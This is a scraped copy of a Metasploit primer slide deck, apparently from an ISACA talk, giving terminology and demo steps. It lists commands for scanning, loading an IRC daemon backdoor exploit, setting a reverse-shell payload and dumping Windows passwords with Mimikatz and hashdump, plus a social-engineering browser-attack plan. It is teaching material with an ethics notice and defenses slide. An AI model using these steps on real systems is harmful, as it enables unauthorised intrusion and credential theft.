Metasploit Primer.pdf - ISACA [PDF]

Metasploit Framework (MSF). Created in 2003 by HD Moore, currently employed by Rapid7,. MSF is “a tool for developing

34 downloads 47 Views 230KB Size

Recommend Stories


Metasploit
Learning never exhausts the mind. Leonardo da Vinci

Metasploit
Just as there is no loss of basic energy in the universe, so no thought or action is without its effects,

Metasploit For Beginners Pdf
You miss 100% of the shots you don’t take. Wayne Gretzky

Metasploit Tutorial Pdf - eBooks Download [PDF]
MSSQL Penetration Testing with Metasploit Metasploit tutorial pdf. Comprehensive Guide to Sniffing. 4 Ways to Capture NTLM Hashes in Network Metasploit tutorial pdf. MSSQL Peneration Testing using Nmap.

Metasploit Pro Console User Guide [PDF]
Apr 10, 2013 - Support for Metasploit Pro and Metasploit Express................................................................2. Support for the Metasploit Framework and Metasploit Community........................................2. Metasploit Cons

Metasploit Pivoting
The happiest people don't have the best of everything, they just make the best of everything. Anony

Metasploit Pro
If you feel beautiful, then you are. Even if you don't, you still are. Terri Guillemets

Metasploit Pro Console User Guide [PDF]
Apr 10, 2013 - Support for Metasploit Pro and Metasploit Express................................................................2. Support for the Metasploit Framework and Metasploit Community........................................2. Metasploit Cons

Introdução ao Metasploit
I tried to make sense of the Four Books, until love arrived, and it all became a single syllable. Yunus

Penetration Testing with Metasploit Framework [PDF]
When i say "Penetration Testing tool" the first thing that comes to your mind is the world's largest. Ruby project, with over 700,000 lines of code 'Metasploit'. No wonder it had become the de-facto standard for penetration testing and vulnerability

Idea Transcript


Metasploit Primer What you wanted to know but never asked.

By: Jeff Toth & Jonathan Singer

Legal and Ethics Everything in this presentation is for educational purposes only. Do not use the Metasploit Framework against systems you do not have permission to test.

Metasploit Framework (MSF) Created in 2003 by HD Moore, currently employed by Rapid7, MSF is “a tool for developing and executing exploit code against a remote target machine.” (Wikipedia) Originally written in Perl, it was later converted to Ruby in ‘07 ●

https://en.wikipedia.org/wiki/Metasploit_Project

Terminology Module - Components in Metasploit

RHOST - Remote Host = Target

Target - Who to attack

LHOST - Local Host = You

Scanner - Collect information from target

Meterpreter - Powerful payload commonly used with Windows

Payload - What code is used to established connection from target

Post-Exploitation - Tasks after target compromise

Methodology Identify Target

Discovery Scan Module

Exploit Module

Exploit & Post-Exploit

Configure Payload

Configure Module

Getting Started ● Ensure Kali is up to date: ○ ○

apt-get update apt-get dist-upgrade

● Start essential services: ○ ○

service postgresql start service metasploit start

● Ensure Metasploit is up to date: ○

msfupdate

Demo Time Linux Target

Identify Target ● Many great enumeration and scanning tools are build into Metasploit. ● nmap - Network Mapper ○

db_nmap -A $TARGET

● Places findings in Metasploit Database for organizational use. ○ ○

hosts services

Search Tools ● There are many, many, modules in Metasploit ● Using search to locate based off of identification ○

search smb

Discovery Scan Module ● Now that we know basic information about our target, we look for vulnerabilities. ○

use auxiliary/scanner/smb/smb_version

● Point the scanning module at the target ○

set RHOSTS $TARGET

● Fire away to get version ○

run

Exploit Module ● Load up an exploit that can be used after information gathering. ○ ○

search ircd use exploit/unix/irc/unreal_ircd_3281_backdoor

● Loads the exploit code used to break into the target ● Where the magic happens

Configure Module ● Allows us set our target and other useful parameters ○

show options

● Set our target RHOST ○

set RHOST $TARGET

● Each exploit has its own set of configurable parameters ● Denotes which ones are required

Configure Payload ● Most popular Windows payload is Meterpreter ● Rich in features for remote control ○ ○

set PAYLOAD cmd/unix/reverse Reverse calls home while Bind opens a port on the target to connect to

● Payload have their own options too ○

show options

● Configure how to call home as a listener ○

set LHOST $SELF

Exploitation & Post-Exploitation ● When we are ready, launch the exploit ○

run

● We have now established connection with our target ● A session is created that we may use to communicate with our remote shell ● During port-exploitation, we may pilfer the system for useful files and data, or hop to additional systems within the network

Demo Time Windows Target

Apply Methodology ● ● ● ●

Target is a Windows User Internet Explorer is a great tool for attackers Plan attack with hosted exploit Coax victim to visit malicious website ○

Social Engineering

● Take control of the victim’s computer

Post-Exploitation with Meterpreter ● Escalate to NT AUTHORITY\SYSTEM ○

get system

● Load additional tools such as Mimikatz ○

load mimikatz

● Pull passwords ○ ○

hashdump wdigest

Basic Defenses ● Metasploit allows for encryption and evasion techniques ○

Makes these attacks difficult to detect sometimes

● Always keep systems up to date ● Restrict processes ○ ○

applocker (Microsoft) EMET (Microsoft)

● Training to prevent Social Engineering ● Consult an Expert

Tools ● Kali Linux ○

https://www.kali.org/

● Metasploitable ● Metasploit Unleashed ○

https://www.offensive-security.com/metasploit-unleashed/

● Google & YouTube

Bio ● ● ● ● ● ●

Senior Security Engineer with GuidePoint Security Master’s Student, USF Cybersecurity OWASP Tampa Chapter Leader Founder of Hack@UCF, Award winning team Drone flier, car hacker, mentor, presentation giver Twitter: @JonathanSinger

GuidePoint Security ● ● ● ●

Overall security consulting and engineering firm Over 100 of the best talented individuals in the industry Please speak with Dick P. and myself! https://guidepointsecurity.com/

Questions?

Smile Life

When life gives you a hundred reasons to cry, show life that you have a thousand reasons to smile

Get in touch

© Copyright 2015 - 2024 PDFFOX.COM - All rights reserved.